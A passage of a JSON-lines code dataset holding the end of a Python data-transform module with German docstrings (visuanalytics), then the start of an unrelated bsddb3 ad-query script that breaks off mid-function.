\"\"\"Speichert den Wert unter `\"key\"` in einem Array.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n if values.get(\"new_key_type\", \"multiple\") != \"single\":\n new_key = values[\"new_keys\"][idx]\n else:\n new_key = values[\"new_keys\"][0]\n new_key_format = data.format(values.get(\"append_type\", \"list\"))\n\n try:\n result = data.get_data(new_key, values)\n except StepKeyError:\n if new_key_format == \"string\":\n data.insert_data(new_key, \"\", values)\n else:\n data.insert_data(new_key, [], values)\n\n result = data.get_data(new_key, values)\n\n if new_key_format == \"string\":\n result = result + data.format(values.get(\"delimiter\", \" \")) + value\n data.insert_data(new_key, result, values)\n else:\n result.append(value)\n\n\n@register_transform\ndef add_symbol(values: dict, data: StepData):\n \"\"\"Fügt ein Zeichen, Symbol, Wort oder einen Satz zu einem Wert hinzu.\n\n Fügt ein Zeichen, Symbol, Wort oder einen Satz zu einem Wert hinzu. Dieses kann sowohl vor als auch hinter dem Wert\n stehen, der mit `\"{_key}\"` eingefügt wird. Außerdem kann man so einen Wert kopieren und einem neuen Key zuweisen, wenn\n man in unter `\"pattern\"` nur `\"{_key}\"` einsetzt.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n new_key = get_new_keys(values, idx)\n\n new_values = data.format(values['pattern'], values)\n data.insert_data(new_key, new_values, values)\n\n\n@register_transform\ndef replace(values: dict, data: StepData):\n \"\"\"Ersetzt ein Zeichen, Symbol, Wort, einen Satz oder eine ganzen Text in einem String.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = str(data.get_data(key, values))\n new_key = get_new_keys(values, idx)\n\n new_value = value.replace(data.format(values[\"old_value\"], values),\n data.format(values[\"new_value\"], values),\n data.get_data(values.get(\"count\", -1), values, int))\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef seperator(values: dict, data: StepData):\n \"\"\"Fügt Trennzeichen in einen Integer hinzu.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = int(data.get_data(key, values))\n new_key = get_new_keys(values, idx)\n\n new_value = '{:,}'.format(value).replace(',', data.format(values[\"seperator\"], values))\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef translate(values: dict, data: StepData):\n \"\"\"Setzt den Wert eines Keys zu einem neuen Key als Wert für die JSON.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = str(data.get_data(key, values))\n new_key = get_new_keys(values, idx)\n translation = data.get_data(values[\"dict\"], values, dict)\n\n new_value = data.format(translation[value], values)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef alias(values: dict, data: StepData):\n \"\"\"Erstzt einen Key durch einen neuen Key.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for key, new_key in zip(values[\"keys\"], values[\"new_keys\"]):\n value = data.get_data(key, values)\n new_key = data.format(new_key, values)\n\n data.insert_data(new_key, value, values)\n\n if not data.get_data(values.get(\"keep_old\", False), {}, bool):\n data.remove_data(key, values)\n\n\n@register_transform\ndef regex(values: dict, data: StepData):\n \"\"\"Führt `\"re.sub\"` für die angegebenen Felder aus.\n regex (suche nach dieser Expression, replace_by (ersetze Expression durch), value (String in dem ersetzt werden soll)\n\n Geht nur für regex ohne backslash \\\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n regex = data.format(values[\"regex\"], values)\n find = fr\"{regex}\"\n replace_by = data.format(values[\"replace_by\"], values)\n new_value = re.sub(find, replace_by, value)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef date_format(values: dict, data: StepData):\n \"\"\"Ändert das Format des Datums und der Uhrzeit.\n\n Ändert das Format des Datums und der Uhrzeit, welches unter `\"given_format\"` angegeben wird, in ein gewünschtes\n anderes Format, welches unter `\"format\"` angegeben wird.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n given_format = data.format(values[\"given_format\"], values)\n date = datetime.strptime(value, given_format).date()\n new_key = get_new_keys(values, idx)\n zeropaded_off = data.get_data(values.get(\"zeropaded_off\", False), values, bool)\n if zeropaded_off:\n new_value = date.strftime(data.format(values[\"format\"], values)).lstrip(\"0\").replace(\" 0\", \" \")\n else:\n new_value = date.strftime(data.format(values[\"format\"], values))\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef timestamp(values: dict, data: StepData):\n \"\"\"Wandelt einen UNIX-Zeitstempel in ein anderes Format um.\n\n Wandelt einen UNIX-Zeitstempel in ein anderes Format um, welches unter `\"format\"` angegeben wird. Ist zeropaded_off\n true, so wird aus z.B. 05 eine 5.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n date = datetime.fromtimestamp(value)\n new_key = get_new_keys(values, idx)\n zeropaded_off = data.get_data(values.get(\"zeropaded_off\", False), values, bool)\n if zeropaded_off:\n new_value = date.strftime(data.format(values[\"format\"], values)).lstrip(\"0\").replace(\" 0\", \" \")\n else:\n new_value = date.strftime(data.format(values[\"format\"], values))\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef date_weekday(values: dict, data: StepData):\n \"\"\"Wandelt das angegebene Datum in den jeweiligen Wochentag um.\n\n Wandelt das angegebene Datum, im unter `\"given_format\"` angegebenen Format, in den jeweiligen Wochentag um.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n day_weekday = {\n 0: \"Montag\",\n 1: \"Dienstag\",\n 2: \"Mittwoch\",\n 3: \"Donnerstag\",\n 4: \"Freitag\",\n 5: \"Samstag\",\n 6: \"Sonntag\"\n }\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(values[\"keys\"][idx], values)\n given_format = data.format(values[\"given_format\"], values)\n date = datetime.strptime(value, given_format).date()\n new_key = get_new_keys(values, idx)\n\n new_value = day_weekday[date.weekday()]\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef date_now(values: dict, data: StepData):\n \"\"\"Generiert das heutige Datum und gibt es im gewünschten Format aus.\n\n Generiert das heutige Datum und gibt es im unter `\"format\"` angegebenen Format aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n new_key = values[\"new_key\"]\n value = datetime.now()\n zeropaded_off = data.get_data(values.get(\"zeropaded_off\", False), values, bool)\n if zeropaded_off:\n new_value = value.strftime(data.format(values[\"format\"], values)).lstrip(\"0\").replace(\" 0\", \" \")\n else:\n new_value = value.strftime(data.format(values[\"format\"], values))\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef wind_direction(values: dict, data: StepData):\n \"\"\"Wandelt einen String von Windrichtungen um.\n\n Funktion nur mit den wind_cdir_full-Werten aus der Weatherbit-API ausführbar.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n value = data.get_data(values[\"key\"], values)\n new_key = get_new_key(values)\n delimiter = data.format(values[\"delimiter\"], values)\n if value.find(delimiter) != -1:\n wind = value.split(delimiter)\n wind_1 = wind[0]\n wind_2 = wind[1]\n wind_dir_1 = data.format(values[\"dict\"][wind_1][\"0\"], values)\n wind_dir_2 = data.format(values[\"dict\"][wind_2][\"0\"], values)\n new_value = f\"{wind_dir_1}-{wind_dir_2}\"\n else:\n new_value = data.format(values[\"dict\"][value][\"1\"], values)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef loop(values: dict, data: StepData):\n \"\"\"Durchläuft das angegebene Array und führt für jedes Element die angegebenen `\"transform\"`-Funktionen aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n loop_values = data.deep_format(values.get(\"values\", None), values=values)\n\n # if values is none use range\n if loop_values is None:\n start = data.get_data(values.get(\"range_start\", 0), values, int)\n stop = data.get_data(values[\"range_stop\"], values, int)\n loop_values = range(start, stop)\n\n for _ in data.loop_array(loop_values, values):\n transform(values, data)\n\n\n@register_transform\ndef add_data(values: dict, data: StepData):\n \"\"\"Fügt Daten zu einem neuen Key hinzu.\n\n Fügt die unter `\"data\"` angegebenen Daten zu einem neuen Key hinzu.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for new_key in values[\"new_keys\"]:\n value = data.deep_format(values[\"data\"], values=values)\n data.insert_data(new_key, value, values)\n\n\n@register_transform\ndef copy(values: dict, data: StepData):\n \"\"\"Kopiert einen Wert zu einem neuen Key.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n new_key = get_new_keys(values, idx)\n new_value = data.get_data(key, values)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef option(values: dict, data: StepData):\n \"\"\"Führt die aufgeführten `\"transform\"`-Funktionen aus, je nachdem ob ein bestimmter Wert `\"true\"` oder `\"false\"` ist.\n\n Wenn der Wert, der in `\"check\"` steht `\"true\"` ist, werden die `\"transform\"`-Funktionen ausgeführt,\n die unter `\"on_true\"` stehen.\n Wenn der Wert, der in `\"check\"` steht `\"false\"` ist, werden die `\"transform\"`-Funktionen ausgeführt,\n die unter `\"on_false\"` stehen.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n values[\"transform\"] = execute_type_option(values, data)\n\n transform(values, data)\n\n\n@register_transform\ndef compare(values: dict, data: StepData):\n \"\"\"Vergleicht zwei Werte miteinander und führt je nachdem ob =, !=, < oder > die \"transform\"-Typen aus.\n\n Wenn `value_left` gleich `value_right`, führe \"transform\"-Typen aus on_equal durch.\n Wenn `value_left` ungleich `value_right`, führe \"transform\"-Typen aus on_not_equal durch.\n Wenn `value_left` größer `value_right`, führe \"transform\"-Typen aus on_higher durch.\n Wenn `value_left` kleiner `value_right`, führe \"transform\"-Typen aus on_lower durch.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n values[\"transform\"] = execute_type_compare(values, data)\n\n transform(values, data)\n\n\n@register_transform\ndef random_value(values: dict, data: StepData):\n \"\"\"Wählt random einen Wert aus einem Array oder einem Dictionary (zu einem bestimmten Key) aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n \"\"\"\n if \"array\" in values:\n for key in values[\"new_keys\"]:\n array = data.get_data(values[\"array\"], values, list)\n length = len(array)\n\n rand = randint(0, length - 1)\n new_value = data.format(array[rand], values)\n data.insert_data(key, new_value, values)\n elif \"dict\" in values:\n for idx, key in data.loop_key(values[\"keys\"], values):\n new_key = get_new_keys(values, idx)\n new_values = data.get_data(values.get(\"dict\", None), values, dict)\n value = str(data.get_data(key, values))\n length = len(new_values[value])\n\n rand = randint(0, length - 1)\n new_value = data.format(new_values[value][rand], values)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef convert(values: dict, data: StepData):\n \"\"\"Konvertiert ein Datentyp in einen anderen Datentyp.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n new_type = locate(values[\"to\"])\n for idx, key in data.loop_key(values[\"keys\"], values):\n new_key = get_new_keys(values, idx)\n value = new_type(data.get_data(key, values))\n\n data.insert_data(new_key, value, values)\n\n\n@register_transform\ndef sort(values: dict, data: StepData):\n \"\"\"Sortiert Wörter nach dem Alphabet oder Zahlen aufsteigend.\n\n Ist reverse auf True gesetzt, werden die Wörter zu Z nach A sortiert, bzw. Zahlen absteigend.\n Achtung: Sortierung von A nach Z\n [\"Argentina\", \"Canada\", \"Cyprus\", \"Germany\", \"Norway\", \"Schweden\", \"USA\", \"United Kingdom\", \"Z\"]\n \"USA\" ist vor \"United Kingdom\", weil bei \"USA\" der zweite Buchstabe auch groß geschrieben ist.\n Würde dort \"Usa\" statt \"USA\" stehen, wäre \"United Kingdom\" vor \"USA\".\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n new_key = get_new_keys(values, idx)\n value = data.get_data(key, values)\n reverse = data.get_data(values.get(\"reverse\", False), values, bool)\n\n new_value = sorted(value, reverse=reverse)\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef most_common(values: dict, data: StepData):\n \"\"\"Sortiert die Wörter nach der Häufigkeit, optional mit Häufigkeit.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n most_c_list = Counter(value).most_common()\n\n if data.get_data(values.get(\"include_count\", False), values, bool):\n new_value = most_c_list\n else:\n new_value = [elm[0] for elm in most_c_list]\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef sub_lists(values: dict, data: StepData):\n \"\"\"Extrahiert aus einem Array (Liste) kleinere Arrays (Listen).\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n value = data.get_data(values[\"array_key\"], values)\n\n for sub_list in values[\"sub_lists\"]:\n start = data.get_data(sub_list.get(\"range_start\", 0), values, numbers.Number)\n end = data.get_data(sub_list.get(\"range_end\", -1), values, numbers.Number)\n new_key = get_new_key(sub_list)\n\n new_value = value[start:end]\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef to_dict(values: dict, data: StepData):\n \"\"\"Wandelt eine Liste aus Tupeln oder Arrays in ein Dictionary um.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n new_value = dict(value)\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef join(values: dict, data: StepData):\n \"\"\"Fügt Elemente einer Liste zu einem String zusammen mit jeweils einem Delimiter dazwischen.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n delimiter = data.format(values.get(\"delimiter\", \"\"), values)\n\n new_value = delimiter.join(value)\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef length(values: dict, data: StepData):\n \"\"\"Gibt die Länge von Arrays (Listen), Strings, Tupeln und Dictionaries aus.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n data.insert_data(new_key, len(value), values)\n\n\n@register_transform\ndef remove_from_list(values: dict, data: StepData):\n \"\"\"Bekommt Stopwords und wandelt die jeweiligen Wörter so um, dass Groß- und Kleinschreibung unwichtig ist.\n\n Bekommt eine Stopword-Liste aus der Textdatei resources/stopwords/stopwords.txt und ggf. die bei der Job-Erstellung\n eingegebenen wurden und wandelt die jeweiligen Wörter so um, dass Groß- und Kleinschreibung unwichtig ist.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n to_remove = data.get_data(values.get(\"to_remove\", []), values, list)\n\n if data.get_data(values.get(\"use_stopwords\", False), values, bool):\n try:\n file = resources.get_resource_path(\"stopwords/stopwords.txt\")\n with open(file, \"r\", encoding='utf-8') as f:\n list_stopwords = f.read().splitlines()\n\n to_remove = to_remove + list_stopwords\n except IOError:\n pass\n\n if data.get_data(values.get(\"ignore_case\", False), values, bool):\n to_remove = [r.lower() for r in to_remove]\n new_value = [v for v in value if v.lower() not in to_remove]\n else:\n new_value = [v for v in value if v not in to_remove]\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef lower_case(values: dict, data: StepData):\n \"\"\"Jedes Wort in der Liste wird komplett in Kleinbuchstaben geschrieben.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n new_value = [each.lower() for each in value]\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef upper_case(values: dict, data: StepData):\n \"\"\"Jedes Wort in der Liste wird komplett in Großbuchstaben geschrieben.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n new_value = [each.upper() for each in value]\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef capitalize(values: dict, data: StepData):\n \"\"\"Der erste Buchstabe jedes Worts in der Liste wird groß geschrieben.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n\n new_value = [each.capitalize() for each in value]\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef normalize_words(values: dict, data: StepData):\n \"\"\"Wörter, die öfter vorkommen und unterschiedliche cases besitzen, werden normalisiert.\n\n Eine Liste wird durchlaufen und jedes Wort welches bei zweiten Vorkommen anders geschrieben wurde als das erste\n vorgekommene wird dann so ersetzt, dass es so geschrieben wird wie das zuerst vorgekommene. Z.B. Bundesliga und\n bundesliga. Aus bundesliga wird Bundesliga.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n new_key = get_new_keys(values, idx)\n already_there = []\n new_value = []\n for each in value:\n if each.upper() in already_there:\n new_value.append(each.upper())\n elif each.lower() in already_there:\n new_value.append(each.lower())\n elif each.capitalize() in already_there:\n new_value.append(each.capitalize())\n else:\n already_there.append(each)\n new_value.append(each)\n\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef split_string(values: dict, data: StepData):\n \"\"\"Teilt einen String am angegebenen Trennzeichen.\n\n Das Trennzeichen können auch mehrere Zeichen sein. Soll die Groß- und Kleinschreibung des Trennzeichens (delimiter) ignoriert werden, setzte `ignore_case` auf `true`.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in data.loop_key(values[\"keys\"], values):\n value = data.get_data(key, values)\n delimiter = data.format(values.get(\"delimiter\", \" \"), values)\n new_key = get_new_keys(values, idx)\n\n if data.get_data(values.get(\"ignore_case\", False), values, bool):\n new_value = re.split(delimiter, value, flags=re.IGNORECASE)\n else:\n new_value = re.split(delimiter, value)\n data.insert_data(new_key, new_value, values)\n\n\n@register_transform\ndef check_key(values: dict, data: StepData):\n \"\"\"Überprüft, ob ein Key vorhanden ist und setzt den dazugehörigen `key` bzw. den `new_keys` auf `true`.\n\n :param values: Werte aus der JSON-Datei\n :param data: Daten aus der API\n :return:\n \"\"\"\n for idx, key in enumerate(values[\"keys\"]):\n try:\n data.get_data(key, values)\n value = True\n except StepKeyError:\n if \"init_with\" in values:\n init = data.deep_format(values[\"init_with\"], values=values)\n data.insert_data(key, init, values)\n\n value = False\n if \"new_keys\" in values:\n data.insert_data(values[\"new_keys\"][idx], value, values)\n","repo_name":"visuanalytics/visuanalytics","sub_path":"src/visuanalytics/analytics/transform/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":28040,"program_lang":"python","lang":"de","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"15707444685","text":"from bsddb3 import db\nimport re\nimport time\n\ndef pd_get_aid(info):\n info = info.split(',')\n return info[0]\n\ndef get_title(aids,adCursor):\n for aid in aids:\n result = adCursor.set(aid.encode(\"utf-8\"))\n if(result != None):\n ad = str(result[1].decode(\"utf-8\"))\n titleSearch = re.search('(.*)',ad)\n title = titleSearch.group(1)\n print(str(result[0].decode(\"utf-8\")) + \": \" + title)\n\ndef get_ad(aids,adCursor):\n for aid in aids:\n result = adCursor.set(aid.encode(\"utf-8\"))\n if(result != None):\n ad = str(result[1].decode(\"utf-8\"))\n print(str(result[0].decode(\"utf-8\")) + \": \" + ad)\n\ndef dateEqual(date,daCursor,adCursor,opt):\n result = daCursor.set(date.encode(\"utf-8\"))\n d_aids = []\n if(result != None):\n d_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n return d_aids \n else:\n print(\"No Entry found\")\n\ndef dateGreaterEqual(date,daCursor,adCursor,opt):\n result = daCursor.set(date.encode(\"utf-8\"))\n d_aids = []\n if(result != None):\n d_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n result = daCursor.set_range(date.encode(\"utf-8\"))\n other = daCursor.next()\n while(other != None):\n if pd_get_aid(str(other[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(other[1].decode(\"utf-8\"))))\n other = daCursor.next() \n else:\n top = daCursor.first()\n while(top != None):\n newdate = time.strptime(date, \"%Y/%m/%d\")\n othdate = time.strptime(str(top[0].decode(\"utf-8\")), \"%Y/%m/%d\")\n if othdate > newdate:\n break\n top = daCursor.next()\n while(top != None):\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = daCursor.next()\n return d_aids\n\ndef dateLess(date,daCursor,adCursor,opt):\n result = daCursor.set_range(date.encode(\"utf-8\"))\n d_aids = []\n if(result != None):\n prev = daCursor.prev()\n while(prev != None):\n if pd_get_aid(str(prev[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(prev[1].decode(\"utf-8\"))))\n prev = daCursor.prev()\n return d_aids\n else:\n print(\"No Entry Found.\")\n\ndef dateGreater(date,daCursor,adCursor,opt):\n result = daCursor.set(date.encode(\"utf-8\"))\n d_aids = []\n if(result != None):\n dup = daCursor.next_dup()\n while(dup != None):\n dup = daCursor.next_dup()\n other = daCursor.next()\n while(other != None):\n if pd_get_aid(str(other[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(other[1].decode(\"utf-8\"))))\n other = daCursor.next()\n else:\n top = daCursor.first()\n while(top != None):\n newdate = time.strptime(date, \"%Y/%m/%d\")\n othdate = time.strptime(str(top[0].decode(\"utf-8\")), \"%Y/%m/%d\")\n if othdate > newdate:\n break\n top = daCursor.next()\n while(top != None):\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = daCursor.next()\n return d_aids\n\ndef dateLessEqual(date,daCursor,adCursor,opt):\n result = daCursor.set(date.encode(\"utf-8\"))\n d_aids = []\n if(result != None):\n d_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = daCursor.next_dup()\n result = daCursor.set_range(date.encode(\"utf-8\"))\n prev = daCursor.prev()\n while(prev != None):\n if pd_get_aid(str(prev[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(prev[1].decode(\"utf-8\"))))\n prev = daCursor.prev()\n else:\n top = daCursor.first()\n while(top != None):\n newdate = time.strptime(date, \"%Y/%m/%d\")\n othdate = time.strptime(str(top[0].decode(\"utf-8\")), \"%Y/%m/%d\")\n if othdate > newdate:\n break\n else:\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in d_aids:\n d_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = daCursor.next()\n return d_aids \n\ndef priceLess(price,prCursor,adCursor,opt):\n stop_price = (\"{:>20}\".format(price))\n curs = prCursor.first()\n p_aids = []\n \n \n if(curs != None): \n while( curs!= None):\n if curs[0].decode(\"utf-8\") >= stop_price:\n break\n else:\n if pd_get_aid(str(curs[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(curs[1].decode(\"utf-8\"))))\n curs = prCursor.next()\n return p_aids \n\ndef priceGreater(price,prCursor,adCursor,opt):\n price = (\"{:>20}\".format(price))\n result = prCursor.set(price.encode(\"utf-8\"))\n p_aids = []\n if(result != None):\n dup = prCursor.next_dup()\n while(dup != None):\n dup = prCursor.next_dup()\n other = prCursor.next()\n while(other != None):\n if pd_get_aid(str(other[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(other[1].decode(\"utf-8\"))))\n other = prCursor.next()\n else:\n top = prCursor.first()\n while(top != None):\n othprice = str(top[0].decode(\"utf-8\"))\n if (othprice > price):\n break\n top = prCursor.next()\n while(top != None):\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = prCursor.next()\n return p_aids\n\ndef priceEqual(price,prCursor,adCursor,opt):\n price = (\"{:>20}\".format(price))\n result = prCursor.set(price.encode(\"utf-8\"))\n p_aids = []\n if(result != None):\n p_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n return p_aids \n else:\n return p_aids\n\ndef priceGreaterEqual(price,prCursor,adCursor,opt):\n price = (\"{:>20}\".format(price))\n result = prCursor.set(price.encode(\"utf-8\"))\n p_aids = []\n if(result != None):\n p_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n result = prCursor.set_range(price.encode(\"utf-8\"))\n other = prCursor.next()\n while(other != None):\n if pd_get_aid(str(other[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(other[1].decode(\"utf-8\"))))\n other = prCursor.next() \n else:\n top = prCursor.first()\n while(top != None):\n othprice = str(top[0].decode(\"utf-8\"))\n if othprice > price:\n break\n top = prCursor.next()\n while(top != None):\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = prCursor.next()\n return p_aids\n\ndef priceLessEqual(price,prCursor,adCursor,opt):\n \n price = (\"{:>20}\".format(price))\n result = prCursor.set(price.encode(\"utf-8\"))\n \n p_aids = []\n if(result != None):\n p_aids.append(pd_get_aid(str(result[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n while(dup != None):\n if pd_get_aid(str(dup[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(dup[1].decode(\"utf-8\"))))\n dup = prCursor.next_dup()\n result = prCursor.set_range(price.encode(\"utf-8\"))\n prev = prCursor.prev()\n while(prev != None):\n if pd_get_aid(str(prev[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(prev[1].decode(\"utf-8\"))))\n prev = prCursor.prev()\n else:\n top = prCursor.first()\n while(top != None):\n othprice = (\"{:>20}\".format(str(top[0].decode(\"utf-8\"))))\n if othprice > price:\n break\n else:\n if pd_get_aid(str(top[1].decode(\"utf-8\"))) not in p_aids:\n p_aids.append(pd_get_aid(str(top[1].decode(\"utf-8\"))))\n top = prCursor.next()\n return p_aids \n\ndef teQuery(keyword,teCursor,adCursor,opt):\n result = teCursor.set(keyword.encode(\"utf-8\")) \n te_aids = []\n if(result != None):\n te_aids.append(str(result[1].decode(\"utf-8\")).split('\\n')[0])\n dup = teCursor.next_dup()\n while(dup != None):\n if str(dup[1].decode(\"utf-8\")).split('\\n')[0] not in te_aids:\n te_aids.append(str(dup[1].decode(\"utf-8\")).split('\\n')[0])\n dup = teCursor.next_dup()\n return te_aids\n else:\n print(\"No Entry Found.\")\n\ndef location(loca,adCursor,opt):\n loca = loca.lower()\n top = adCursor.first()\n loc_aids = []\n while (top != None):\n ad = str(top[1].decode(\"utf-8\"))\n locSearch = re.search('(.*)',ad)\n loc = locSearch.group(1)\n if (loc.lower() == loca):\n loc_aids.append(top[0].decode(\"utf-8\"))\n top = adCursor.next()\n return loc_aids\n\ndef cat(ca,adCursor,opt):\n ca = ca.lower()\n top = adCursor.first()\n ca_aids = []\n while (top != None):\n ad = str(top[1].decode(\"utf-8\"))\n catSearch = re.search('(.*)',ad)\n cat = 